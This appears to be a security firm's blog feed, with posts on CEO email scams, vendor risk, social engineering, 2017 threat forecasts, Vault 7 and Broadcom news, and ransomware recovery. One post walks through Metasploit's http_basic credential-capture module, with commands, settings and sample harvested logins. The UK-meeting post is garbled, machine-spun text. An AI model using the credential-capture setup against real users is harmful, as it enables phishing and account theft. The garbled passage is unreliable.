Cyber safety recommendation #1: start on the Very pinnacle by means of preventing The CEO scam consistent with the FBI, commercial enterprise electronic mail compromise (BEC), additionally called the “CEO scam,” has emerged as a worldwide hazard, costing agencies billions of dollars global. The CEO rip-off is a kind of charge fraud that entails the compromise of legitimate business electronic mail accounts – often belonging to either the chief govt officer or the chief economic officer – for the cause of carrying out unauthorized cord transfers.

You might imagine you and your personnel are clever sufficient to outsmart a BEC strive, however nowadays’s cyber criminals are a whole lot greater savvy than the scammers of the beyond. these fraudsters first do a variety of research on you, different organization executives, and your agency. Then, to lessen the likelihood of raising suspicions, they use your organisation’s own language inside the fraudulent e-mail, request wire transfers in dollar quantities that appear legitimate, and advantage access to electronic mail threads about billing and invoices.

The days of being alerted to a rip-off e-mail due to misspellings, poor grammar, or unusual terms are lengthy long gone. And once a switch takes place, the window of time to show the scam and recoup your organization’s price range could be very short.

It’s crucial to make sure that you and your employer do now not fall victim to the CEO rip-off within the first location. IDSS recommends starting with the subsequent five cyber security procedures:

1.   set up a 2-step verification method for bills, casting off the capability for one character to authorize transfers on their personal
2.   put in force huge controls over your bank accounts and keep in mind in case your wire transfer dollar limits are too high
3.   overview your switch machine’s passwords for period and complexity, and use a 2-step authentication (as opposed to simply requiring one username and password for login)
4.   educate your personnel, in particular those with get entry to to enterprise funds or have the authority to send transfers, that requests for secrecy or strain to take action have to alert them to a rip-off
5.    meeting with your financial institutions to put into effect the security offerings they provide

CEO scam is a enormously simple crime to dedicate, and so it is probably going to keep growing in popularity among cyber criminals. Putting in a processes with checks and balances for transfers or payments of any type. You can enhance the security of your corporation’s inner processing systems and close your company’s doors to fraudsters at once.

Cyber security 
source: mail-compromise


Contact IDSS for insight and training needs!

Credential Harvesting Exploit - All Browser

Have you ever been to a site that looks correct but something feels diffferent? These are typically phishing sites that are used to collect your credentials. In 2017 a few of these have been used to collect information regarding banking sites or email credentials. Yahoo was one of the major releases that impacted millions of users across multiple email domains. Some examples are,, and others. 

How do you prevent this? As a user you need to follow you instincts while on the web, the same as you do in real life. Protecting your usernames and passwords are critical to protecting yourself online. Same as if someone asked you in person to exchange your social security number. You would not do that in real life if you didn't know the source was proven. Right ?

When online, be caution, be aware and protect your identity. Take the same precautions you use in real life for your personal safety while online.


With all that said, we at IDSS are detailing a credential harvesting expolit that impacts all browser. It is not a complicated exploit, but it is a efficent exploit. The success is based on expoliting users, not technology.  Below is a quick tutorial on how the exploit works and how it is configured.


--------- Credential Harvesting  ----------------

Start the exploit on a server or local system

msf > use auxiliary/server/capture/http_basic

Configure the exploit to connect to your local system or server.

msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Description
   ----         ---------------  --------     --------------
   REALM        Secure Site      The authentication realm you'd like to present.
   RedirectURL                        The page to redirect users to after they enter basic auth creds
   SRVHOST           The local host to listen on. This must be an address on the local machine or server
   SRVPORT      80                  The local port to listen on.
   SSL          false                    Negotiate SSL for incoming connections
   SSLCert                               Path to a custom SSL certificate (default is randomly generated)
   URIPATH                              The URI to use for this exploit (default is random)

Example settings

msf  auxiliary(http_basic) > set SRVHOST Local-IP-Address

msf  auxiliary(http_basic) > set URIPATH /login

msf auxiliary(http_basic) > set SRVHOST 192.168.XX.XX
SRVHOST => 192.168.XX.XX
msf auxiliary(http_basic) > set REdirectURL /login
REdirectURL => /login

Initiate Exploit:

msf auxiliary(http_basic) > exploit
[*] Auxiliary module execution completed

[*] Listening on 192.168.XX.XX:80...
[*] Using URL: http://192.168.XX.XX:80/f5vZqwKH
[*] Server started.

Example of captured Credentials.

msf auxiliary(http_basic) > [*] Sending 401 to client 192.168.XX.XX
scr[+] 192.168.XX.XX - Credential collected: "targets:t@rget" => /f5vZqwKH
[*] Redirecting client 192.168.XX.XX to /login

Cleaner Option:

msf auxiliary(http_basic) > exploit
[*] Auxiliary module execution completed

[*] Listening on 192.168.XX.XX:80...
[*] Using URL: http://192.168.XX.XX:80/login
[*] Server started.
msf auxiliary(http_basic) > [*] Sending 401 to client 192.168.XX.XX
[+] 192.168.XX.XX - Credential collected: "gotcha:Password1" => /login
[*] Redirecting client 192.168.XX.XX to

The second option redirects the user to a know site. In this example I used our IDSS front page. In a true credential harvesting situation, the redirect would be sent to the actual banking site, email login or true website. After the credentials have been collected, the attacker no longer needs information. They will use the information for malicious purposes and exploit your identity online.


Contact IDSS for training to prevent this exploit

More from Vault 7 - Project

As part of its Vault 7 series of leaked documents, whistleblowing website WikiLeaks today released a new cache of 27 documents allegedly belonged to the US Central Intelligence Agency (CIA).

Named Grasshopper, the latest batch reveals a CLI-based framework developed by the CIA to build "customised malware" payloads for breaking into Microsoft's Windows operating systems and bypassing antivirus protection.

All the leaked documents are basically a user manual that the agency flagged as "secret" and that are supposed to be only accessed by the members of the agency, WikiLeaks claims.

Grasshopper: Customized Malware Builder Framework

According to the leaked documents, Grasshopper framework allows the agency members to easily create custom malware, depending upon the technical details, such as what operating system and antivirus the targets are using.

The Grasshopper framework then automatically puts together several components sufficient for attacking the target, and finally, delivers a Windows installer that the agency members can run on a target's computer and install their custom malware payloads.

    "A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components," the documentation reads. "Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload."

The whistleblowing website claimed the Grasshopper toolset was allegedly designed to go undetected even from the anti-virus products from the world's leading vendors including Kaspersky Lab, Symantec, and Microsoft.

CIA's Grasshopper Uses 'Stolen' Russian Malware

According to WikiLeaks, the CIA created the Grasshopper framework as a modern cyber-espionage solution not only to be as easy to use as possible but also "to maintain persistence over infected Microsoft Windows computers."

    "Grasshopper allows tools to be installed using a variety of persistence mechanisms and modified using a variety of extensions (like encryption)," Wikileaks said in the press release.

One of the so-called persistence mechanisms linked to Grasshopper is called Stolen Goods (Version 2), which shows how the CIA adapted known malware developed by cyber criminals across the world and modified it for its own uses.

One such malware is "Carberp," which is a malware rootkit developed by Russian hackers.

    "The persistence method and parts of the installer were taken and modified to fit our needs," the leaked document noted. "A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified."

It is not yet clear how recently the CIA has used the hacking tools mentioned in the documentation, but WikiLeaks says the tools were used between 2012 and 2015.

So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for popular hardware and software, the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs, and the third batch called "Marble."

Marble revealed the source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.
Swati - Hacking News
Swati Khandelwal


Contact IDSS to assist in Mitigation

Mobile Devices are Vulnerable - Broadcom

In addition to a previous bluetooh hacking Proof of Concept Post by IDS, we have details the impact of the issue which impacts IOS and Android users !!! Over Wifi !! 


A broad array of Android phones are vulnerable to attacks that use booby-trapped Wi-Fi signals to achieve full device takeover, a researcher has demonstrated.


The vulnerability resides in a widely used Wi-Fi chipset manufactured by Broadcom and used in both iOS and Android devices. Apple patched the vulnerability with Monday's release of iOS 10.3.1. "An attacker within range may be able to execute arbitrary code on the Wi-Fi chip," Apple's accompanying advisory warned. In a highly detailed blog post published Tuesday, the Google Project Zero researcher who discovered the flaw said it allowed the execution of malicious code on a fully updated 6P "by Wi-Fi proximity alone, requiring no user interaction."


Google is in the process of releasing an update in its April security bulletin. The fix is available only to a select number of device models, and even then it can take two weeks or more to be available as an over-the-air update to those who are eligible. Company representatives didn't respond to an e-mail seeking comment for this post.


The proof-of-concept exploit developed by Project Zero researcher Gal Beniamini uses Wi-Fi frames that contain irregular values. The values, in turn, cause the firmware running on Broadcom's wireless system-on-chip to overflow its stack. By using the frames to target timers responsible for carrying out regularly occurring events such as performing scans for adjacent networks, Beniamini managed to overwrite specific regions of device memory with arbitrary shellcode. Beniamini's code does nothing more than write a benign value to a specific memory address. Attackers could obviously exploit the same series of flaws to surreptitiously execute malicious code on vulnerable devices within range of a rogue access point.


Basic mitigations missing


Besides the specific stack overflow bugs exploited by the proof-of-concept attack, Beniamini said a lack of security protections built into many software and hardware platforms made the Broadcom chipset a prime target.


"We’ve seen that while the firmware implementation on the Wi-Fi SoC is incredibly complex, it still lags behind in terms of security," he wrote. "Specifically, it lacks all basic exploit mitigations—including stack cookies, safe unlinking and access permission protection (by means of [a memory protection unit.])"


The Broadcom chipset contains an MPU, but the researcher found that it's implemented in a way that effectively makes all memory readable, writeable, and executable. "This saves us some hassle," he wrote. "We can conveniently execute our code directly from the heap." He said that Broadcom has informed him that newer versions of the chipset implement the MPU more effectively and also add unspecified additional security mechanisms.


Given the severity of the vulnerability, people with affected devices should install a patch as soon as it's available. For those with vulnerable iPhones, that's easy enough. As is all too often the case for Android users, there's no easy way to get a fix immediately, if at all. That's because Google continues to stagger the release of its monthly patch bundle for the minority of devices that are eligible to receive it.


At the moment, it's not clear if there are effective workarounds available for vulnerable devices. Turning off Wi-Fi is one possibility, but as revealed in recent research into an unrelated Wi-Fi-related weakness involving Android phones, devices often relay Wi-Fi frames even when Wi-Fi is turned off. This post will be updated if word of a better workaround emerges.


Contact us at IDSS to help you mitigate this RISK !!

Protecting your data from your 3rd party Vendors!

What do you need to do to protect you from your vendors?

In recent years, 63 percent of breaches were traced to third-party vendors, according to the Soha System’s survey on third-party risk management. Witness a 2015 attack (discovered only in early 2016) of a large fast food restaurant chain. Through the login credentials of a third-party service provider, hackers were able to gain access to the point-of-sale system used by more than 1,000 franchise restaurants leading to the exposure of customers’ credit card information. Other recent high-profile breaches resulting from third-party compromises include large discount chain stores, pharmacies and medical centers.

On average, organizations spent $10 million responding to third-party breaches over the previous 12 months, according to a May 2016 Ponemon report. But organizational risk isn’t limited just to direct revenue loss. Reputational impacts, regulatory exposure and lawsuits can cause lasting damage and lead to job losses for executives, directors and others in the organization.

Gauging vendors’ risks

A deep understanding of the cybersecurity capabilities of your vendors and contractors is critical to protecting devices and data, counsels the AT&T Cybersecurity Insights report. Organizations can begin by requiring third parties to complete detailed questionnaires about their security practices, be open to security audits and even conduct penetration tests to help assess the strength of their cyberdefenses. How an organization then folds vendor assessments into its own security profile is determined by size:

Small or medium-size organizations: Request each vendor to provide a security assessment report that lists the security controls they have in place and the last time they performed a security review.

Large organizations: Include the risk assessment of all vendors in the organization’s master risk register.

For all organizations, security assessments should be ongoing. A variety of third-party monitoring services are available that can further help lessen your exposure to third-party-based breaches.

Strengthening your security profile

With an assessment of your vendors’ security capabilities in hand, you can move on to implementing a robust third-party management program. Best practices to include:

Third-party security management begins at the top. The CEO and boards of directors should be involved in overseeing strategy and ensuring employees are educated on vendor cybersecurity.

Not all vendors need the same level of access to your network. Determine their data needs and assign privilege levels that outline the type of access – least to high — based on their assessed risk profile.

The IoT and cloud require additional considerations. Understand the level of threat from third parties’ use of the IoT and cloud and implement strategies to reduce those risks.

Know your third parties’ details. Maintain a current register of each of your vendors that includes their contact information and the information they can access.

All organizations need to recognize that partners and other third party entities may be a weak link in their overall security regimes. But by taking the necessary precautions to keep hackers from exploiting trusted relationships, you can reduce your exposure to the vast majority of cyberattacks.

Carin Hughes is an editor of the AT&T Cybersecurity Insights reports.

So what do you do?  Ask them the right questions! Then keep them honest with audits and reports. 

1. How do you take raw data from the network and correlate events to determine whether an attack is under way? 

2. May I see the resumes of the staffers who will be working on my account?

3. Do you have references from companies that are the same size as my company, in the same industry or in the same area? 

4. How will you charge for services out of scope? 

5. How will communications between organizations be managed? 

6. What processes will be used to control access to devices and logs? 

7. What auditing is in place for access/change control and reporting? 

8. Do you provide phone or in-person support for security incident remedies? 

9. What are your disaster recovery safeguards? 

10.How does the MSSP protect the data-center cloud environment? 

Contact IDSS

We will provide you with the solutions and expertise to manage this relationship.


Social Engineering and Counter Measures

What is social engineering?

Social engineering is the art of manipulating users of a computing system into revealing confidential information that can be used to gain un-authorized access to a computer system. The term can also include activities such as exploiting human kindness, greed and curiosity to gain access to restricted access buildings or getting the users to installing backdoor software.


Gather Information: This is the first stage, the learns as much as he can about the intended victiom. The information is gathered from company web sites, other publications and sometimes by talking to the users of the target system.

Plan Attack: The attackers outline how he/she intends to execute the attack

Acquire Tools: These include computer programs that an attacker will use when launching the attack.

Attack: Exploit the weaknesses in the target system.

Use acquired knowledge: Information gathered during the social engineering tactics such as pet names, birthdates of the organization founders etc is used in attacks such as password guessing.


Common Social Engineering Techniques:

Social engineering techniques can take many forms. The following is the list of the commonly used techniques.


Familiarity Exploit: Users are less suspicious of people they are familiar with. An attacker can familiarize him/herself with the users of the target system prior to the social engineering attack. The attacker may interact with users during meals, when users are smoking he may join, on social events etc. This makes the attacker familiar to the users. Let’s suppose that the user works into a building that requires an access code or card to gain access, the attacker may follow the users as they enter such places. The users are most like to hold the door open for the attacker to go in as they are familiar with them. The attacker can also ask for answers to questions such as where you met your spouse, the name of your high school math teacher etc. The users are most likely to reveal answers as they trust the familiar face. This information could be used to hack email accounts and other accounts that ask similar questions if one forgets their password.


Intimidating Circumstances: People tend to avoid people who intimidate others around them. Using this technique, the attacker may pretend to have a heated argument on phone or with an accomplice in the scheme. The attacker may then ask users for information which would be used to compromise the security of the users’ system. The users are most likely give the correct answers just to avoid having a confrontation with the attacker. This technique can also be used to avoid been checked at a security check point.


Phishing: This technique uses trickery and deceit to obtain private data from users. The social engineer may try to impersonate a genuine website such as yahoo and then ask the unsuspecting user to confirm their account name and password. This technique could also be used to get credit card information or any other valuable personal data.


Tailgating: This technique involves following users behind as they enter restricted areas. As a human courtesy, the user is most likely to let the social engineer inside the restricted area.


Exploiting human curiosity: Using this technique, the social engineer may deliberately drop a virus infected flash disk in an area where the users can easily pick it up. The user will most likely plug the flash disk into the computer.


Exploiting human greed: Using this technique, the social engineer may lure the user with promises of making a lot of money online by filling in a form and confirm their details using credit card details etc.


Social Engineering Counter Measures


Most techniques employed by social engineers involve manipulating human biases. To counter such techniques, an organization can;


To counter the familiarity exploit, the users must be trained to not substitute familiarity with security measures. Even the people that they are familiar with must prove that they have the authorization to access certain areas and information.


To counter intimidating circumstances attacks, users must be trained to identify social engineering techniques that fish for sensitive information and politely say no.


To counterphishing techniques, most sites such as yahoo use secure connections to encrypt data and prove that they are who they claim to be. Checking the URL may help you spot fake sites. Avoid responding to emails that request you to provide personal information.


To counter tailgating attacks, users must be trained not to let others use their security clearance to gain access to restricted areas. Each user must use their own access clearance.


To counter human curiosity, it’s better to submit picked up flash disks to system administrators who should scan them for viruses or other infection preferably on an isolated machine.


To counter techniques that exploit human greed, employees must be trained on the dangers of falling for such scams.

2017 Attack Forecast From Industry Partners

At the beginning of this year, I answered the question: Why more security predictions and how can you benefit? At the end of that article, I told readers to expect even more security predictions as we head into 2017. That has turned out to be true — with a twist.

No doubt, there are more lists looking toward the future than ever before. As I examined hundreds of technology and security articles, blogs, slideshows, videos and infographics related to upcoming 2017 events, I’ve seen a growing number of organizations prefer to name their views on the coming year as “forecasts” or “trends” or “projections.” I suppose that a “forecast” does sound more scientific — like a weather forecast that is based on mathematical models, satellites, radar and much more.



What is quite clear is that these lists contain a wide variety of content that ranges from hopes (you might even call them New Year's resolutions based on what vendors are already working on) to connecting-the-dots threat projections (based on 2015 and 2016 data) to educated guesses on security to dramatic cyberspeculations that get media attention. Security predictions are also showing up on other lists from automobile announcements to defense spending to the home toy market.

Nevertheless, I maintain my view that the security and technology industries offer tremendous value with these cyber research reports and expert analysis on threats from their best and brightest. I strongly urge technology and security pros to review these referenced lists and check them twice, in order to improve your strategic plans, product road maps, incident response scenarios and overall business operation.

 For background and comparison purposes, here's a reminder of the top 15 security predictions for 2015 and the top 16 security predictions for 2016. On a personal level, understanding online risk trends within your industry is a must for ongoing career growth and maintaining security thought-leadership as well as to enable workable technology solutions.

So here’s my “Guide to 2017 Security Predictions,” for readers who want to see the specific company prediction details as we head toward New Year’s Day 2017. If you want to jump to conclusions, my cyberprediction award-winners follow at the end.

The Top 17 Security Predictions by Company

1) Symantec — The three lists of predictions that are offered by Symantec are very similar to the lists offered by others, so I offer them here (with details at their website):

Cloud Generation dynamics define the future of the enterprise

- The enterprise network will expand and become increasingly undefined and diffuse.

- Ransomware will attack the cloud.

- AI/machine learning will require sophisticated big data capabilities.

Cybercrime becomes mainstream

- Rogue nation states will finance themselves by stealing money.

- Fileless malware will increase.

- Secure Sockets Layer (SSL) abuse will lead to increased phishing sites using HTTPS.

- Drones will be used for espionage and explosive attacks.

IoT comes to enterprise business

- The proliferation of the Cloud Generation.

- IoT devices will increasingly penetrate the enterprise, leading to increased IoT DDoS attacks.

2) Trend Micro — The list of eight security predictions offered by Trend Micro doesn’t contain any “wows,” but the explanations are again very helpful, offering in-depth explanations. Unlike some other companies, they think ransomware will plateau, but “attack methods and targets will diversify.”

They also predict that “Adobe and Apple will outpace Microsoft in terms of platform vulnerability discoveries.”

They also call out increasing “cyberpropaganda” as the use of tools and methods to influence elections and public opinion. “Most recently, we have seen platforms like WikiLeaks used for propaganda — with highly compromising materials leaked through the site just a week before the US elections. In our continuous monitoring of the cybercriminal underground, we also noted script kiddies advertise their earnings from fake election-related news. They claim to make around US$20 per month by driving traffic to fabricated smear content about electoral candidates.”

3) McAfee — This excellent white paper (in PDF format) offered by McAfee covers a wide range of trends and 2017 predictions that are worth noting. Here are a few highlights from their 14 predictions:

- Ransomware will remain a very significant threat until the second half of 2017. Ransomware-as-a-service, custom ransomware for sale in dark markets, and creative derivatives from open source ransomware code will keep the security industry busy through the first half of the year. Ransomware’s impact across all sectors and geographies will force the security industry to take decisive actions. We predict that initiatives like the No More Ransom! collaboration, the development and release of anti-ransomware technologies, and continued law enforcement actions will reduce the volume and effectiveness of ransomware attacks by the end of 2017.

- “Dronejacking” places threats in the sky

- IoT malware opens a backdoor into the home

- Machine learning accelerates social engineering attacks

- The explosion in fake ads and purchased “likes” erodes trust

- Hacktivists expose privacy issues

- Threat intelligence sharing makes great strides

 4) Forcepoint — There are 10 Forcepoint predictions, and like many other companies, they offer a webcast and a downloadable document with details. A few of their highlights include:

- Compliance & Data Protection Convergence — 2017 will be the final full year before the European Union’s (EU) General Data Protection Regulation (GDPR) is a legal requirement. GDPR demands may drive business costs higher as new data protection controls are applied and multiple stakeholders grapple with the who, when and how of data accessibility requirements.

- Rise of the Corporate Incentivized Insider Threat — A new corporate-incentivized insider threat may clash with customer data, corporate profit and other performance goals, forcing businesses to re-evaluate their corporate environments and growth strategies.

- Voice-first Platforms & Command Sharing — The rise of voice-activated AI to access Web, data and apps will open up creative new attack vectors and data privacy concerns.

5) FireEye — A slightly different approach was taken by FireEye this year. They offer good questions and related answers regarding 2017. Here are a few highlights:

“In 2017, cyber security battles may favor criminals even more as the Internet of Things (IoT) continues to expand possible avenues of attack. The 2017 security predictions from FireEye include insights on:

- What investments security organizations will make in 2017. Security integration and orchestration should be considered the benchmarks of new technology investment.

- Which industry or type of organization might unexpectedly become a target of threat groups in 2017? Religious institutions in Western countries are at the top of the list because they typically lack a robust security program yet maintain contact information and other sensitive data.

- How threat groups will continue to target industrial control systems (ICS) in the near future? A recent report revealed that security patches were not yet available for more than 30% of identified ICS vulnerabilities.”

 6) Kaspersky — Kaspersky Lab predicts that 2017 will continue to see the commodification of financial attacks.

"The commodification of attacks along the lines of the 2016 SWIFT heists — with specialized resources being offered for sale in underground forums or through as-a-service schemes, will continue in 2017. As payment systems become increasingly popular and common, this will be matched by a greater criminal interest next year.

As far as ransomware is concerned, Kaspersky Lab also anticipates the continuing rise of ransomware, but with the unlikely trust relationship between the victim and their attacker — based on the assumption that payment will result in the return of data.”

7) Palo Alto Networks — The list of Palo Alto predictions for 2017 is impressive. Their items are divided into “sure things” and “longshots.” They cover many cyberareas, including our cybertalent shortage.

- A few ‘sure things’ include: “Recruiters Search for Cyber Talent Outside of Security” and “The need for non-technical security professionals will also increase.”

Longshots include: “Companies acquire other organizations to inherit talent.”  

 8) Watchguard Technologies — I really like the various 2017 prediction offerings via several channels from Watchguard Technologies. They offer creative predictions, infographics, YouTube videos on their top predictions and more. Here are two examples:

- First on their Watchguard list is Ransomworm, and this video below describes what that means. They also describe IaaS as an attack platform and surface and new steps in a global cyberwar leading to a civilian casualty.

I also like this infographic listing 2017 predictions from Watchguard Technologies.

9) Imperva — There has consistently been a good list of predictions from Imperva over the years. This year they offer:

- Botnet of Things

- Ghosts from the past

- Cyber Fatigue

10) Beyond Trust — There are 10 cybersecurity predictions offered by BeyondTrust. They lead with this bold item: The first nation state cyber-attack will be conducted and acknowledged as an act of war.”

They also list Tor v2, cloud-based attacks, and: “Behavioral technologies, such as pressure, typing speed and fingerprints, will be embedded into newly-released technologies.”

11) Checkpoint — There are Checkpoint predictions for mobile, industrial Internet of Things (IIoT), critical infrastructure, threat prevention and the cloud from Checkpoint. “An attack to disrupt or take down a major cloud provider will affect all of their customers’ businesses. While generally disruptive, it would be used as a means to impact a specific competitor or organization, who would be one of many affected, making it difficult to determine motive. There will also be a rise in ransomware attacks impacting cloud-based data centers.”

12) Forrester — The list of 2017 predictions from Forrester covers every major enterprise area, but details need to be purchased. In the cybersecurity area, they predict that risks will intensify. They also say, “Security And Skills Will Temper Growth Of IoT.” (Note that both Gartner and Forrester are using these predictions as lures to buy their more in-depth prediction analysis.)

13) Gartner — Always known for their ability to put percentages next to their predictions, Gartner offered these free security predictions regarding the next 2-4 years several months back. More recently, Gartner offers these free mobile security predictions — with advice attached.

- The first significant finding in the report is that, “Mobile attacks (PegasusXcodeGhost) and vulnerabilities (StagefrightHeartbleed) are increasing in terms of both number and pragmatism.

- Now is the time to start your Mobile Threat Defense (MTD) initiative.

- No EMM? Mobile Threat Defense protects employees and eliminates privacy concerns.

14) White Hat Security — Some very interesting predictions here, including this one from Dan Lacey:

Nothing will change. “Attackers will continue to discover and exploit zero-days. Companies large and small will continue to lose data and money to the usual attacks, often because they didn’t take basic security precautions. Individuals will continue to lose money in the usual ways, often because they lack basic knowledge of Internet safety. Manufacturers will continue to produce Internet-connected devices with no security, or easily by-passable security, enabling attackers to hijack them. Someone might pass laws mandating that new Internet of Things devices have security, but those laws will be unenforceable and impossible to apply retroactively. No one will deploy a better authentication system than passwords.”

15) Sophos — Here is another example of cybersecurity trends for 2017 from Sophos, which reads a lot like other lists, staring with: “Destructive DDoS IOT attacks will rise.”

But at the same time, they offer this on encryption’s downside: “As encryption becomes ubiquitous, it has become much harder for security products to inspect traffic, making it easier for criminals to sneak through undetected. Unsurprisingly, cybercriminals are using encryption in creative new ways. Security products will need to tightly integrate network and client capabilities, to rapidly recognize security events after code is decrypted on the endpoint.”

16) IDC – And if you are not depressed yet, IDC leads with‘2017 will be worse in every aspect of information security’

This report, which was focused on Africa, also predicts more consolidating and outsourcing of security – which seems likely in other parts of the world as well.

17) IBM – The twelve predictions offered by IBM were a mix of industry experts and their own internal security leaders in various industries. They lead with more adoption of intelligence-led approaches to threats. Full disclosure: I am one of the experts included in the IBM list, with one of my predictions regarding fake news and online deception.

And for a few added extra predictions to check out, Dark Reading offers eight bold security predictions, including the LogRhythm prediction from CISO James Carder that the entire Internet will go down for a day. Also on the list – Tripwire’s prediction that 2017 will bring the return of the worm.

I also like Microsoft’s blog describing 17 women with predictions for 2017 and also for 2027.

Other good security prediction write-ups that I’ve seen include: Forbes.comBetanewsThe Register (UK) on hiringComputerworldRSAITWorldCanadaGigamon CTO Shehzad MerchantESET and Above Security.


2017 Prediction Wrap-Up

Almost everyone is saying that things will get worse in cyberspace before they get better. Most also think we are years away from meaningful, lasting cybersecurity answers. Still, our security industry progress is measured in small victories in many subcategories.

(As a side note, I have decided to cut back on the cyber prediction awards this year, offering only a few closing perspectives and trends regarding industry predictions.)

And yet, here are a few (see details earlier in article):

Most Creative — Watchguard Technology’s ‘Ransomworm’

Most Scary — LogRhythm prediction from CSIO James Carder that the entire Internet will go down for a day.

Most Common and Likely — More Internet of Things (IoT) Malware leading to more DDoS attacks. (It’s already happening.)

Most Dull (yet also insightful) — Dan Lacey, White Hat Security: ‘Nothing will change.’

There is no doubt that the most common security predictions include an increase and expansion of cyberthreats against the cloud, more IoT attacks leading to disruptions, more (and different) ransomware and an increase in nation-state/cyberwar issues cutting across international lines.

What's missing? Companies have again held back on predicting a major Cyber Pearl Harbor or Cyber 9/11 type event, but many did predict that cyberterrorism will be growing more destructive in 2017. There is also a lack of government cybersecurity predictions covering what the new Trump Administration might do in the coming year. Finally, I was surprised that we didn't see more of a spotlight on 'bug bounties' or coordinated vulnerability disclosure programs - which I think will surge in government and other industries in the next few years. 

For a wider view on global security trends in 2017, I encourage readers to take a look at the 2017 Global Forecast from the Center for Strategic & International Studies (CSIS). This website offers many in-depth insights, along with a 107-page report that covers many security topics, including cybersecurity.

In conclusion, the cybersecurity market is growing rapidly. According to market report, “We anticipate 12-15 percent year-over-year growth through 2021. ...

The U.S. government has increased its annual cybersecurity budget by 35 percent, going from $14 billion budgeted in 2016 to $19 billion in 2017. This is a sign of the times and there’s no end in sight. Incremental increases in cyber security spending are not enough. We expect businesses of all sizes and types, and governments globally, to double down on cyber protection.”

So despite some less than encouraging predictions regarding online safety and security, the future looks bright in 2017 for those who can offer workable solutions to solve security problems in cyberspace.

As Thomas Edison reportedly said last century: “Opportunity is missed by most people because it is dressed in overalls and looks like work.”

And, "There's a way to do it better — find it."


Credit to:


Contact us at IDSS to help you protect your data!


UK Cyber Security Meeting

The BBC has published reports regarding Cyber security meetings to discuss the state of cyber protection in the UK.

Fears drop proficiency Russian Nosy Parkerism try excited in earlier months, among allegations of meddling in the electoral processes of a number of countries. US tap chiefs try on offender Moscow of painful to vigour November's presidential meeting in an solicitation to boost Donald Trump's chances of beating Hillary Clinton. In December, Germany's urbane facility instrumentality presumed Russia was painful to destabilise the motherland alongside handbill and cyber attacks ahead of its general election later this year. And an component to French presidential office-seeker Emmanuel Macron new told Atmosphere Ill-fated the office-seeker is crude targeted by Moscow in a parallel campaign of hacking and fake news.

These types of meetings bring cybersecurity to the front in the media. High profile meetings like this are great for exposure but terrible for confidence. We as a security firm always review the agenda of these meetings. After reviewing the objectives of this meeting we have more confidence in our solutions to protect you.  

To learn more, contact us at IDSS. We will protect your company and data. 

Contact US !!

Social Media, Friend of Foe?

Facebook had 1.55 billion monthly active users. That is a lot of data.

        Social media is a great forum to communicate with your extended family and friends. A wonderful place to expand you exposure to the world around you. Facebook, Twitter, Instagram and all other social media sites are engraved in our daily routine. IDS utilize social media for marketing, security writes, and exposure. This brought up a good conversation regarding, why social media is such a big market. It is because of the data, collected, analyzing trends, user behaviors, and learning about us. 

        As a security firm, who is focused on protecting data, I began to dig deeper, into what type of data is collected. To be honest, most of the data collected is volunteered by the user. This is completed by privacy settings of posts, and search settings. I understand that for a company data is critical and should be protected from unauthorized access. As companies use social media more and more, it has become a concern for me. I asked my self, do companies really understand, what they are sharing and with who?

        Mobile applications help streamline usage of social media platforms. A famous app called "Most Used Words on Facebook" has been shared thousands of times but it may be stealing the information of those who use it, media reported. This application went viral, collecting massive amounts of data to display word maps. Simple right, nothing sensitive. Well, as I looked at the permission needed for this app, I started to be concerned. The application requested access to otherwise private posts, pictures, and tags. The application broke the facebook permissions while it collected the data, and copied it to another server. How do you feel now?  I was very concerned. Who now would have access to this data? What would they do with it? 

        The app's terms of service state that all of the information it takes will continue to be stored even if you shut your account and also point out that the information could be stored on any of our servers, at any location. Once it has sold that data on, it gives no protection for how it is used. You have just freely donated your data to an unknown source for the profit of that company.


Contact US To Help protect YOU !

Is the Cloud Safe ?

   In recent studies 49% of decision makers stated they believe cloud services are not secure. Are you part of the 49%? As a security firm, IDS believes that all solutions can be secured. Treating your cloud services the same as on premise services is critcal to your security. If you are sourcing out services to cloud, you need to take the same proactive steps required for on premise solutions. Many companies use cloud services for Email, Document Sharing, and Collaboration. Microsoft, Google, Amazon, and many other service providers offer cloud services. When reading the SLA's you should notice that these types of services do not accept data loss responsibilities. As a decision maker for your company, that should be a concern. You are trusting a service provider with your critical data and data. Why not scan the vendor just like your dedicated on premise services.

       41% believed that all cloud-based services are ‘inherently insecure. Is that really the case? The only way to be sure is to take proactive steps to hold the cloud service providers accountable. General opinions of IT are negative. Data Breaches are common news in this world we live in. Decision makers for companies need to know what the breaches are, and why the vendor didn't know in advance. The transparency between the client and vendors processs woukld be ideal. You have the freedom to scan the vendors, with the vendors approval, to proactively maintain security compliances. Scanning your vendors for compliance is not only good practice for your peace of mind, it also maintains the vendors integrity. This is a "win, win" solution. It will also establish the vendor to client relationship as priority. You are proactively protecting your data and alerting the vendor of the vulnerabilities in the services. This allows them to provide better services to all customers.

         Now that you understand the importance of securing your data. How? That is where IDS steps in. We can work with you throughout the process. Scanning cloud services are similar to the on premise services. It just adds a layer of communication with the cloud provider. Don't worry, we can help.


Contact US to help!

Ransomware! Why ME??

  Ransomware is a software exploit that will hold your companies data in expectation of a payment. The most recent trend of variants of the Crypto virus has brought this to the security forefront. As a security professional, this has become more frequent.  What do you do when you are “crypto'd”?

       The easiest resolution is to recover from a backup. Yes, that is one of the reasons every company should have a reliable and secure backup solution.  In this model, all that is needed is a restore point, and the files will be restored decrypted or in the original state.  If you don't have a secure backup solution you should 

       What happens if I do not have a backup? That is where the process gets much more difficult. If you have been impacted by the TeslaCrypto v2.8 virus, you have a chance. It is a complicated process, but it can be done. Using a python script on a server with you can run a software called TeslaDecrypt. This is for older versions and give you a chance. 

    Well, you will need to build and run tools from a python backend. Two files are needed parses .vvv file headers, identifies their public keys, and for files where the corresponding private key is already known, performs the actual decryption, and reconstructs the private key from the previously found factors of the public key. Python will need the pycrypto module installed. I recommend using Msieve and the wrapper.

